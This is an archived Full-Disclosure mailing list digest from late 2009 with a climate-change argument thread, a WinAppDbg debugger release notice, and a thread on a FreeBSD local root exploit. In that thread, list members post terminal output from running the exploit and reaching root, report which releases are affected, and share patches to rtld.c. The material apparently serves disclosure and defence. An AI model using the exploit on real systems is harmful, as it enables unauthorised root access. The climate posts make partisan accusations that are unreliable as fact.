From quanticle at gmail.com Tue Dec 1 00:13:30 2009 From: quanticle at gmail.com (Rohit Patnaik) Date: Mon, 30 Nov 2009 18:13:30 -0600 Subject: [Full-disclosure] Software developer looks at CRU code In-Reply-To: <46F86709B47F845ED0749591@utd65257.utdallas.edu> References: <4B13BC26.1080603@gmail.com> <104C18DE1276642B0A2BE2F5@utd65257.utdallas.edu> <6a5e46470911301400w60f84e93nd5296d48db026aa5@mail.gmail.com> <46F86709B47F845ED0749591@utd65257.utdallas.edu> Message-ID: <6a5e46470911301613x419eda2frb345c9cfc0c7f4fc@mail.gmail.com> Right, but you said that the global warming folks are asking for unnecessary spending of *trillions*. Where would those trillions go? I don't see Al Gore becoming richer than Bill Gates off carbon credits. Neither do I see the UN gaining any more power via the IPCC. If anything, the existing climate treaty (i.e. the Kyoto protocol) has completely sidestepped the UN. I guess what I'm troubled by is the fact that you seem to be stating that there's some kind of deliberate malice on the part of those stating that anthropogenic climate change is real. I don't see malice. I see a fair amount of incompetence, but incompetence exists in every discipline. --Rohit Patnaik On Mon, Nov 30, 2009 at 6:06 PM, Paul Schmehl wrote: > I'm going to assume this is a serious question. > > You could start with the people enriching themselves off of carbon credits. > Al Gore, for one obvious example. You could continue with the people that > think the entire world should be ruled by a bureaucracy called the UN. You > could go on with the "scientists" who get millions of dollars worth of > grants to "study" the problem and propose solutions. > > Are there people on the opposing side who benefit from what you call > scaremongering? Of course there are. But the claims of the global warming > crowd are unsupported by the data (not *their* data, because they have > clearly skewed it to support their claims, as is proven both by their emails > and their program code) but by the real data, unmassaged. > > > --On Monday, November 30, 2009 16:00:05 -0600 Rohit Patnaik < > quanticle at gmail.com> wrote: > > There's a question I ask whenever I hear a theory like this. Cui bono? >> Who benefits? Who is benefiting from the "climate change >> scaremongering"? >> You claim that trillions of dollars will need to be spent. If its such a >> scam, then who is scamming us? The UN IPCC? A mysterious cabal of >> alternative energy companies? The Trilateral Commission? >> >> > -- > Paul Schmehl, Senior Infosec Analyst > As if it wasn't already obvious, my opinions > are my own and not those of my employer. > ******************************************* > "It is as useless to argue with those who have > renounced the use of reason as to administer > medication to the dead." Thomas Jefferson > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091130/cb6248a6/attachment.html From pschmehl_lists at tx.rr.com Tue Dec 1 00:06:19 2009 From: pschmehl_lists at tx.rr.com (Paul Schmehl) Date: Mon, 30 Nov 2009 18:06:19 -0600 Subject: [Full-disclosure] Software developer looks at CRU code In-Reply-To: <6a5e46470911301400w60f84e93nd5296d48db026aa5@mail.gmail.com> References: <4B13BC26.1080603@gmail.com> <104C18DE1276642B0A2BE2F5@utd65257.utdallas.edu> <6a5e46470911301400w60f84e93nd5296d48db026aa5@mail.gmail.com> Message-ID: <46F86709B47F845ED0749591@utd65257.utdallas.edu> I'm going to assume this is a serious question. You could start with the people enriching themselves off of carbon credits. Al Gore, for one obvious example. You could continue with the people that think the entire world should be ruled by a bureaucracy called the UN. You could go on with the "scientists" who get millions of dollars worth of grants to "study" the problem and propose solutions. Are there people on the opposing side who benefit from what you call scaremongering? Of course there are. But the claims of the global warming crowd are unsupported by the data (not *their* data, because they have clearly skewed it to support their claims, as is proven both by their emails and their program code) but by the real data, unmassaged. --On Monday, November 30, 2009 16:00:05 -0600 Rohit Patnaik wrote: > There's a question I ask whenever I hear a theory like this.? Cui bono?? > Who benefits?? Who is benefiting from the "climate change scaremongering"?? > You claim that trillions of dollars will need to be spent.? If its such a > scam, then who is scamming us?? The UN IPCC?? A mysterious cabal of > alternative energy companies?? The Trilateral Commission?? > -- Paul Schmehl, Senior Infosec Analyst As if it wasn't already obvious, my opinions are my own and not those of my employer. ******************************************* "It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead." Thomas Jefferson From ivanhec at gmail.com Tue Dec 1 00:21:16 2009 From: ivanhec at gmail.com (Ivan .) Date: Tue, 1 Dec 2009 11:21:16 +1100 Subject: [Full-disclosure] Software developer looks at CRU code In-Reply-To: <6a5e46470911301613x419eda2frb345c9cfc0c7f4fc@mail.gmail.com> References: <4B13BC26.1080603@gmail.com> <104C18DE1276642B0A2BE2F5@utd65257.utdallas.edu> <6a5e46470911301400w60f84e93nd5296d48db026aa5@mail.gmail.com> <46F86709B47F845ED0749591@utd65257.utdallas.edu> <6a5e46470911301613x419eda2frb345c9cfc0c7f4fc@mail.gmail.com> Message-ID: <6450e99d0911301621x4de05c18i7a6ee30a4ab65add@mail.gmail.com> just ask Al of the Gore about his carbon trading exchange he setup with Ken Lay of Enron fame as advisor... http://www.youtube.com/watch?v=UjHAB62xKXI On Tue, Dec 1, 2009 at 11:13 AM, Rohit Patnaik wrote: > Right, but you said that the global warming folks are asking for unnecessary > spending of *trillions*.? Where would those trillions go?? I don't see Al > Gore becoming richer than Bill Gates off carbon credits.? Neither do I see > the UN gaining any more power via the IPCC.? If anything, the existing > climate treaty (i.e. the Kyoto protocol) has completely sidestepped the UN. > > I guess what I'm troubled by is the fact that you seem to be stating that > there's some kind of deliberate malice on the part of those stating that > anthropogenic climate change is real.? I don't see malice.? I see a fair > amount of incompetence, but incompetence exists in every discipline. > > --Rohit Patnaik > > On Mon, Nov 30, 2009 at 6:06 PM, Paul Schmehl > wrote: >> >> I'm going to assume this is a serious question. >> >> You could start with the people enriching themselves off of carbon >> credits. ?Al Gore, for one obvious example. ?You could continue with the >> people that think the entire world should be ruled by a bureaucracy called >> the UN. ?You could go on with the "scientists" who get millions of dollars >> worth of grants to "study" the problem and propose solutions. >> >> Are there people on the opposing side who benefit from what you call >> scaremongering? ?Of course there are. ?But the claims of the global warming >> crowd are unsupported by the data (not *their* data, because they have >> clearly skewed it to support their claims, as is proven both by their emails >> and their program code) but by the real data, unmassaged. >> >> --On Monday, November 30, 2009 16:00:05 -0600 Rohit Patnaik >> wrote: >> >>> There's a question I ask whenever I hear a theory like this.? Cui bono? >>> Who benefits?? Who is benefiting from the "climate change >>> scaremongering"? >>> You claim that trillions of dollars will need to be spent.? If its such a >>> scam, then who is scamming us?? The UN IPCC?? A mysterious cabal of >>> alternative energy companies?? The Trilateral Commission? >>> >> >> -- >> Paul Schmehl, Senior Infosec Analyst >> As if it wasn't already obvious, my opinions >> are my own and not those of my employer. >> ******************************************* >> "It is as useless to argue with those who have >> renounced the use of reason as to administer >> medication to the dead." Thomas Jefferson >> > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From cody at hawkhost.com Tue Dec 1 00:16:41 2009 From: cody at hawkhost.com (Cody Robertson) Date: Mon, 30 Nov 2009 19:16:41 -0500 Subject: [Full-disclosure] ** FreeBSD local r00t zeroday In-Reply-To: <4B1455EC.3030103@covertinferno.org> References: <4B1455EC.3030103@covertinferno.org> Message-ID: <661A3B06-AE3B-485E-A3E1-FAADBAF017D1@hawkhost.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Nov 30, 2009, at 6:31 PM, phantomcircuit wrote: > Confirmed on 7.2-RELEASE-p4 fully patched according to freebsd-update. > > %sh exploit.sh > Desktop env env.c exploit exploit.c exploit.sh payload.c payload.o > private program.c program.o public public_html run.sh w00t.so.1.0 > FreeBSD local r00t zeroday > by Kingcope > November 2009 > env.c: In function 'main': > env.c:5: warning: incompatible implicit declaration of built-in > function > 'malloc' > env.c:9: warning: incompatible implicit declaration of built-in > function > 'strcpy' > env.c:11: warning: incompatible implicit declaration of built-in > function 'execl' > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > ALEX-ALEX > # id > uid=1001(phantomcircuit) gid=20(staff) euid=0(root) > groups=20(staff),0(wheel) > # uname -a > FreeBSD phantomcircuit.mine.nu 7.2-RELEASE-p4 FreeBSD 7.2-RELEASE-p4 > #0: > Fri Oct 2 12:21:39 UTC 2009 > root at i386-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC i386 > # > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ 7.2-RELEASE [codyr at popo ~]$ ./env /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX # -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (Darwin) iEYEARECAAYFAksUYGkACgkQAr2PPaFwRupDPQCcDtqiPyNof9ST2gLjJBw8pNMM nMQAn0ynrghE5hrzeuIWVIdZg5N5N1hT =HN3D -----END PGP SIGNATURE----- From rpsfa at rit.edu Tue Dec 1 01:40:59 2009 From: rpsfa at rit.edu (Ryan Steinmetz) Date: Mon, 30 Nov 2009 20:40:59 -0500 Subject: [Full-disclosure] ** FreeBSD local r00t zeroday In-Reply-To: References: <72f8221d0911301412r26a72e54g595ac7b364e63346@mail.gmail.com> <1b0d006c0911301449q1e3fafd5q5e7811ce074e0b14@mail.gmail.com> Message-ID: <20091201014059.GA48267@fast.rit.edu> 6.4-RELEASE not vuln On (11/30/09 22:51), Benji wrote: > 7.0 not vuln. > > On Mon, Nov 30, 2009 at 10:49 PM, Ed Carp wrote: > > > On 11/30/09, Kingcope wrote: > > > > > Systems tested/affected > > > ********************************** > > > FreeBSD 8.0-RELEASE *** VULNERABLE > > > FreeBSD 7.1-RELEASE *** VULNERABLE > > > FreeBSD 6.3-RELEASE *** NOT VULN > > > FreeBSD 4.9-RELEASE *** NOT VULN > > > > Glad I still run 6.3! How about 6.4? > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -- Ryan Steinmetz Lead Security/Systems Administrator Infrastructure Engineering Rochester Institute of Technology 585.475.5663 PGP: EF36 D45A 5CA9 28B1 A550 18CD A43C D111 7AD7 FAF2 From mvilas at gmail.com Tue Dec 1 03:47:33 2009 From: mvilas at gmail.com (Mario Alejandro Vilas Jerez) Date: Tue, 1 Dec 2009 00:47:33 -0300 Subject: [Full-disclosure] WinAppDbg 1.3 is out! Message-ID: <3fbf862f0911301947u1d501626k8507d81b2231c66e@mail.gmail.com> What is WinAppDbg? ================== The WinAppDbg python module allows developers to quickly code instrumentation scripts in Python under a Windows environment. It uses ctypes to wrap many Win32 API calls related to debugging, and provides an object-oriented abstraction layer to manipulate threads, libraries and processes, attach your script as a debugger, trace execution, hook API calls, handle events in your debugee and set breakpoints of different kinds (code, hardware and memory). Additionally it has no native code at all, making it easier to maintain or modify than other debuggers on Windows. The intended audience are QA engineers and software security auditors wishing to test / fuzz Windows applications with quickly coded Python scripts. Several ready to use utilities are shipped and can be used for this purposes. Current features also include disassembling x86 native code (using the open source diStorm project, see http://ragestorm.net/distorm/), debugging multiple processes simultaneously and produce a detailed log of application crashes, useful for fuzzing and automated testing. Where can I find WinAppDbg? =========================== Project homepage: ----------------- http://tinyurl.com/winappdbg Download links: --------------- Windows installer (32 bits) http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.3/winappdbg-1.3.win32.msi/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.3/winappdbg-1.3.win32.exe/download Windows installer (64 bits) http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.3/winappdbg-1.3.win-amd64.msi/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.3/winappdbg-1.3.win-amd64.exe/download Source code http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.3/winappdbg-1.3.zip/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.3/winappdbg-1.3.tar.bz2/download Documentation: -------------- Online http://winappdbg.sourceforge.net/doc/v1.3/ http://sourceforge.net/apps/trac/winappdbg/wiki/ProgrammingGuide For download: http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.3/winappdbg-1.3.chm/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.3/winappdbg-1.3.pdf/download What's new in this version? =========================== In a nutshell... * 64 bits support. * Windows Vista and 7 support. * Memory dumping support. * Wait chain support. * New tool: SelectMyParent (based on the tool by Didier Stevens). * More code examples. * Supports detecting the current processor architecture and Windows version. * Crash logger works with SQLite databases in addition to the old DBM format. It also has a smaller memory footprint now. * Win32 API wrappers were refactored and improved. Many new definitions and API calls were added, up to Windows 7. * Many bugfixes as usual... :) also several improvements to make the code more robust. Here's the full changelog: http://sourceforge.net/apps/trac/winappdbg/log/trunk?verbose=on&format=changelog&stop_rev=237&limit=300&mode=stop_on_copy From pschmehl_lists at tx.rr.com Tue Dec 1 04:40:46 2009 From: pschmehl_lists at tx.rr.com (Paul Schmehl) Date: Mon, 30 Nov 2009 22:40:46 -0600 Subject: [Full-disclosure] Software developer looks at CRU code In-Reply-To: <6a5e46470911301613x419eda2frb345c9cfc0c7f4fc@mail.gmail.com> References: <4B13BC26.1080603@gmail.com> <104C18DE1276642B0A2BE2F5@utd65257.utdallas.edu> <6a5e46470911301400w60f84e93nd5296d48db026aa5@mail.gmail.com> <46F86709B47F845ED0749591@utd65257.utdallas.edu> <6a5e46470911301613x419eda2frb345c9cfc0c7f4fc@mail.gmail.com> Message-ID: --On Monday, November 30, 2009 6:13 PM -0600 Rohit Patnaik wrote: > Right, but you said that the global warming folks are asking for > unnecessary spending of *trillions*.? Where would those trillions go? Apparently you haven't read the proposals to deal with global warming. An MIT study found the cost of complying with one proposed energy sector bill designed to deal with global warming would be $4500 annually per family of four. The EPA analyzed the bill and estimated its cost at 500 billion dollars by the year 2030. And that's just for the US. And just one suggested "solution" to the so-called problem. > I don't see Al Gore becoming richer than Bill Gates off carbon credits. So unless Al Gore makes more than Bill Gates he's not motivated to proselytize for global warming? He's already made millions of dollars off the scam, but I suppose his motivations were of the purest form. > Neither do I see the UN gaining any more power via the IPCC.? If > anything, the existing climate treaty (i.e. the Kyoto protocol) has > completely sidestepped the UN.? > Anything that takes power away from local communities concentrates power in larger governmental entities. By the same token, anything that takes power away from nations, concentrates power in a larger entity - in this case, the UN, which would supposedly administer fines for non-compliance, etc., etc. > I guess what I'm troubled by is the fact that you seem to be stating that > there's some kind of deliberate malice on the part of those stating that > anthropogenic climate change is real.? I don't see malice.? I see a > fair amount of incompetence, but incompetence exists in every discipline. > Have you read the emails that were exposed by the hackers? The "scientists" have deliberately misled the public regarding the data, conspired to deny FOI requests (which may be a criminal offense), attempted to get the media to both ignore and denigrate the opposition and written programs designed to deliberately skew the data in their favor and hide unfavorable data. If that isn't malice, what is? Paul Schmehl As if it wasn't already obvious, my opinions are my own and not those of my employer. From ivanhec at gmail.com Tue Dec 1 04:51:18 2009 From: ivanhec at gmail.com (Ivan .) Date: Tue, 1 Dec 2009 15:51:18 +1100 Subject: [Full-disclosure] Software developer looks at CRU code In-Reply-To: References: <4B13BC26.1080603@gmail.com> <104C18DE1276642B0A2BE2F5@utd65257.utdallas.edu> <6a5e46470911301400w60f84e93nd5296d48db026aa5@mail.gmail.com> <46F86709B47F845ED0749591@utd65257.utdallas.edu> <6a5e46470911301613x419eda2frb345c9cfc0c7f4fc@mail.gmail.com> Message-ID: <6450e99d0911302051n69553b7dld95b87edda19e138@mail.gmail.com> watch the video, but the Al of the Gore bit is at 1.40 in http://www.youtube.com/watch?v=VebOTc-7shU On Tue, Dec 1, 2009 at 3:40 PM, Paul Schmehl wrote: > --On Monday, November 30, 2009 6:13 PM -0600 Rohit Patnaik > wrote: > > > Right, but you said that the global warming folks are asking for > > unnecessary spending of *trillions*. Where would those trillions go? > > Apparently you haven't read the proposals to deal with global warming. An > MIT study found the cost of complying with one proposed energy sector bill > designed to deal with global warming would be $4500 annually per family of > four. The EPA analyzed the bill and estimated its cost at 500 billion > dollars by the year 2030. And that's just for the US. And just one > suggested "solution" to the so-called problem. > > > I don't see Al Gore becoming richer than Bill Gates off carbon credits. > > So unless Al Gore makes more than Bill Gates he's not motivated to > proselytize for global warming? He's already made millions of dollars off > the scam, but I suppose his motivations were of the purest form. > > > Neither do I see the UN gaining any more power via the IPCC. If > > anything, the existing climate treaty (i.e. the Kyoto protocol) has > > completely sidestepped the UN. > > > > Anything that takes power away from local communities concentrates power in > larger governmental entities. By the same token, anything that takes power > away from nations, concentrates power in a larger entity - in this case, > the UN, which would supposedly administer fines for non-compliance, etc., > etc. > > > I guess what I'm troubled by is the fact that you seem to be stating that > > there's some kind of deliberate malice on the part of those stating that > > anthropogenic climate change is real. I don't see malice. I see a > > fair amount of incompetence, but incompetence exists in every discipline. > > > > Have you read the emails that were exposed by the hackers? The > "scientists" have deliberately misled the public regarding the data, > conspired to deny FOI requests (which may be a criminal offense), attempted > to get the media to both ignore and denigrate the opposition and written > programs designed to deliberately skew the data in their favor and hide > unfavorable data. > > > > > If that isn't malice, what is? > > Paul Schmehl > As if it wasn't already obvious, > my opinions are my own and not > those of my employer. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091201/31bf55b7/attachment.html From contact at davidberard.fr Tue Dec 1 05:25:25 2009 From: contact at davidberard.fr (David Berard) Date: Tue, 1 Dec 2009 06:25:25 +0100 Subject: [Full-disclosure] ** FreeBSD local r00t zeroday In-Reply-To: <20091201014059.GA48267@fast.rit.edu> References: <72f8221d0911301412r26a72e54g595ac7b364e63346@mail.gmail.com> <1b0d006c0911301449q1e3fafd5q5e7811ce074e0b14@mail.gmail.com> <20091201014059.GA48267@fast.rit.edu> Message-ID: <672FC9CE-C48E-4A7A-A0BF-66587A2996DC@davidberard.fr> > 7.0 not vuln. 7.0 vulnerable here, $ ./env /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX # uname -r 7.0-RELEASE-p3 > > On Mon, Nov 30, 2009 at 10:49 PM, Ed Carp wrote: > >> On 11/30/09, Kingcope wrote: >> >>> Systems tested/affected >>> ********************************** >>> FreeBSD 8.0-RELEASE *** VULNERABLE >>> FreeBSD 7.1-RELEASE *** VULNERABLE >>> FreeBSD 6.3-RELEASE *** NOT VULN >>> FreeBSD 4.9-RELEASE *** NOT VULN >> >> Glad I still run 6.3! How about 6.4? >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -- David BERARD ------------------------------------------------- contact(at)davidberard.fr GPG|PGP KeyId 0xC8533354 GPG|PGP Key http://davidberard.fr/C8533354.gpgkey ------------------------------------------------- * No electrons were harmed in * * the transmission of this email * -------------- next part -------------- A non-text attachment was scrubbed... Name: PGP.sig Type: application/pgp-signature Size: 163 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091201/9e1b60f4/attachment.bin From chort0 at gmail.com Tue Dec 1 05:45:38 2009 From: chort0 at gmail.com (bk) Date: Mon, 30 Nov 2009 21:45:38 -0800 Subject: [Full-disclosure] ** FreeBSD local r00t zeroday In-Reply-To: <672FC9CE-C48E-4A7A-A0BF-66587A2996DC@davidberard.fr> References: <72f8221d0911301412r26a72e54g595ac7b364e63346@mail.gmail.com> <1b0d006c0911301449q1e3fafd5q5e7811ce074e0b14@mail.gmail.com> <20091201014059.GA48267@fast.rit.edu> <672FC9CE-C48E-4A7A-A0BF-66587A2996DC@davidberard.fr> Message-ID: On Nov 30, 2009, at 9:25 PM, David Berard wrote: >> 7.0 not vuln. > > 7.0 vulnerable here, > > $ ./env > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > ALEX-ALEX > # uname -r > 7.0-RELEASE-p3 Here as well: bin/Kingcope.sh: new file: 35 lines, 772 characters. [chort at demon ~]$ chmod +x bin/Kingcope.sh [chort at demon ~]$ Kingcope.sh bin ktrace.out scratch vent_stalk FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl' /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX # whoami root # uname -a FreeBSD demon.smtps.net 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008 root at logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386 It's a VM if that matters. -- chort From oliver.pinter at gmail.com Tue Dec 1 10:12:04 2009 From: oliver.pinter at gmail.com (Oliver Pinter) Date: Tue, 1 Dec 2009 11:12:04 +0100 Subject: [Full-disclosure] ** FreeBSD local r00t zeroday In-Reply-To: References: <72f8221d0911301412r26a72e54g595ac7b364e63346@mail.gmail.com> <672FC9CE-C48E-4A7A-A0BF-66587A2996DC@davidberard.fr> Message-ID: <200912011112.04657.oliver.pinter@gmail.com> On Tuesday 01 December 2009 06.45.38 bk wrote: > On Nov 30, 2009, at 9:25 PM, David Berard wrote: > >> 7.0 not vuln. > > > > 7.0 vulnerable here, > > > > $ ./env > > /libexec/ld-elf.so.1: environment corrupt; missing value for > > /libexec/ld-elf.so.1: environment corrupt; missing value for > > /libexec/ld-elf.so.1: environment corrupt; missing value for > > /libexec/ld-elf.so.1: environment corrupt; missing value for > > /libexec/ld-elf.so.1: environment corrupt; missing value for > > ALEX-ALEX > > # uname -r > > 7.0-RELEASE-p3 > > Here as well: > > bin/Kingcope.sh: new file: 35 lines, 772 characters. > [chort at demon ~]$ chmod +x bin/Kingcope.sh > [chort at demon ~]$ Kingcope.sh > bin ktrace.out scratch vent_stalk FreeBSD local r00t zeroday > by Kingcope > November 2009 > env.c: In function 'main': > env.c:5: warning: incompatible implicit declaration of built-in function > 'malloc' env.c:9: warning: incompatible implicit declaration of built-in > function 'strcpy' env.c:11: warning: incompatible implicit declaration of > built-in function 'execl' /libexec/ld-elf.so.1: environment corrupt; > missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > ALEX-ALEX > # whoami > root > # uname -a > FreeBSD demon.smtps.net 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 > 19:59:52 UTC 2008 > root at logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386 > > It's a VM if that matters. > > -- > chort > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ with cpercivals patch: op at oliverp exploit> ./local_root_exploit_env.sh local_root_exploit_env.sh FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl' /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; aborting -- thanks, Oliver From r00fsec at gmail.com Tue Dec 1 11:59:59 2009 From: r00fsec at gmail.com (r00f r00f) Date: Tue, 1 Dec 2009 11:59:59 +0000 Subject: [Full-disclosure] ** FreeBSD local r00t zeroday Message-ID: <8a1ab0ce0912010359l1acf3e59w9253956dab200b73@mail.gmail.com> I have a box with release 7.1 uname -a gives back this : FreeBSD 7.1-RELEASE #0: Thu Jan 1 14:37:25 UTC 2009 i686 i686 i386 GNU/Linux by running the exploit it gives me this error and doesn't getting rooted..I didn't do anything to patch it ..:s and it doesn't works :p FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl' "c1: error: unrecognized command line option "-fPIC gcc: program.o: No such file or directory 'cc: unrecognized option '-nostartfiles cp: cannot stat `w00t.so.1.0': No such file or directory test.sh: line 35: ./env: No such file or directory -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091201/7c38821e/attachment.html From cperciva at freebsd.org Tue Dec 1 01:26:46 2009 From: cperciva at freebsd.org (Colin Percival) Date: Mon, 30 Nov 2009 17:26:46 -0800 Subject: [Full-disclosure] ** FreeBSD local r00t zeroday Message-ID: <4B1470D6.1090401@freebsd.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi all, A short time ago a "local root" exploit was posted to the full-disclosure mailing list; as the name suggests, this allows a local user to execute arbitrary code as root. Normally it is the policy of the FreeBSD Security Team to not publicly discuss security issues until an advisory is ready, but in this case since exploit code is already widely available I want to make a patch available ASAP. Due to the short timeline, it is possible that this patch will not be the final version which is provided when an advisory is sent out; it is even possible (although highly doubtful) that this patch does not fully fix the issue or introduces new issues -- in short, use at your own risk (even more than usual). The patch is at http://people.freebsd.org/~cperciva/rtld.patch and has SHA256 hash ffcba0c20335dd83e9ac0d0e920faf5b4aedf366ee5a41f548b95027e3b770c1 I expect a full security advisory concerning this issue will go out on Wednesday December 2nd. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (FreeBSD) iEYEARECAAYFAksUbjcACgkQFdaIBMps37LP9ACgljaYCfgVuhD2gd9Natpq4H/9 i48An1mgl+Mih+AWN7J9KZ1rsiEU31IZ =MPXj -----END PGP SIGNATURE----- -- Colin Percival Security Officer, FreeBSD | freebsd.org | The power to serve Founder / author, Tarsnap | tarsnap.com | Online backups for the truly paranoid From contact at davidberard.fr Tue Dec 1 12:39:31 2009 From: contact at davidberard.fr (David Berard) Date: Tue, 1 Dec 2009 13:39:31 +0100 Subject: [Full-disclosure] ** FreeBSD local r00t zeroday In-Reply-To: <4B1470D6.1090401@freebsd.org> References: <4B1470D6.1090401@freebsd.org> Message-ID: > The patch is at > http://people.freebsd.org/~cperciva/rtld.patch > This patch doesn't work under FreeBSD 7.x due to inexistant unsetenv(LD_ "ELF_HINTS_PATH"); in rtld.c This patch seem to fix the issue on FreeBSD 7.x --- /usr/src/libexec/rtld-elf/rtld.c 2008-11-25 03:59:29.000000000 +0100 +++ /usr/src/libexec/rtld-elf/rtld.c.new 2009-12-01 13:09:15.000000000 +0100 @@ -358,11 +358,12 @@ * future processes to honor the potentially un-safe variables. */ if (!trust) { - unsetenv(LD_ "PRELOAD"); - unsetenv(LD_ "LIBMAP"); - unsetenv(LD_ "LIBRARY_PATH"); - unsetenv(LD_ "LIBMAP_DISABLE"); - unsetenv(LD_ "DEBUG"); + if (unsetenv(LD_ "PRELOAD") || unsetenv(LD_ "LIBMAP") || + unsetenv(LD_ "LIBRARY_PATH") || unsetenv(LD_ "LIBMAP_DISABLE") || + unsetenv(LD_ "DEBUG")) { + _rtld_error("environment corrupt; aborting"); + die(); + } } ld_debug = getenv(LD_ "DEBUG"); libmap_disable = getenv(LD_ "LIBMAP_DISABLE") != NULL; Best Regards. -- David BERARD ------------------------------------------------- 23 Boulevard MARENGO, Appartement A15 31500 TOULOUSE contact(at)davidberard.fr GPG|PGP KeyId 0xC8533354 GPG|PGP Key http://davidberard.fr/C8533354.gpgkey ------------------------------------------------- * No electrons were harmed in * * the transmission of this email * -------------- next part -------------- A non-text attachment was scrubbed... Name: PGP.sig Type: application/pgp-signature Size: 163 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091201/faed9a73/attachment.bin From randallm at fidmail.com Tue Dec 1 13:21:10 2009 From: randallm at fidmail.com (RandallM) Date: Tue, 1 Dec 2009 07:21:10 -0600 Subject: [Full-disclosure] Software developer looks at CRU code Message-ID: > > ------------------------------ > > Message: 7 > Date: Mon, 30 Nov 2009 17:58:07 -0600 > From: Paul Schmehl > Subject: Re: [Full-disclosure] Software developer looks at CRU code > To: Valdis.Kletnieks at vt.edu, full-disclosure at lists.grok.org.uk > Message-ID: <9FDEE72348C6AE04EDD44AF2 at utd65257.utdallas.edu> > Content-Type: text/plain; charset=us-ascii; format=flowed > > No, Valdis. ?There *is* no saving us. Not true. according to the UN if we 'just" reduce human population or prevent more population that will help, right? http://www.cnsnews.com/news/article/57328 -- been great, thanks a.k.a System From me at b3nji.com Tue Dec 1 15:34:02 2009 From: me at b3nji.com (Benji) Date: Tue, 1 Dec 2009 15:34:02 +0000 